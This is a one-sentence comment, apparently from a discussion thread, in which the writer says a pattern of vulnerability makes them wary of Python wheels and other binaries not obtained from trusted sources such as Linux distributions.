                                                                                        This pattern of vulnerability is my biggest fear when using Python wheels, or any other binary executable that doesn’t come from a trusted source like a Linux distro.